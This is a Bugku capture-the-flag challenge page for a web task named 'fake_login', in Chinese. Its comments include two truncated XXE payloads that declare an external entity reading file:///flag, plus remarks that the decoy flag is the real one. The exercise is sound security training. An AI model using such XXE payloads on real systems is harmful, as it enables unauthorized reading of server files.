fake_login - Bugku CTF

fake_loginWEB 未解决

分数: 0 金币: 0

题目作者: 未知

一　　血: dai

一血奖励: 0金币

解　　决: 14

提　　示:

描　　述:

flag{}

评论

MRLD 1月前

举报

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE user [ <!ELEMENT name ANY > <!ENTITY admin SYSTEM "file:///flag" >]> <user><userna

回复 0

MRLD 1月前

举报

真得出生出题人,假flag是真的,闲的这样搞

回复 0

gooddemo 2月前

举报

这个是xxe漏洞，所以在点击提交按钮时，修改Payload，内容如下：<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///flag">]> <user><use

回复 0

hopeinhand 4月前

举报

找半天结果假flag是真的，很迷惑

回复 0

WriteUp

hopeinhand

1 金币

立即查看

评分(0)

暂无评分

解题动态

Ramrem 攻破了该题 2天前

平凡的人攻破了该题 29天前

小何lv 攻破了该题 1月前

cc 攻破了该题 1月前

MRLD 攻破了该题 1月前

18092952956 攻破了该题 1月前

宫崎骏攻破了该题 2月前

宫园薰攻破了该题 2月前

gooddemo 攻破了该题 2月前

hopeinhand 攻破了该题 4月前

firefly 攻破了该题 4月前

admin889 攻破了该题 5月前

enderman 攻破了该题 6月前

dai 获得了一血 6月前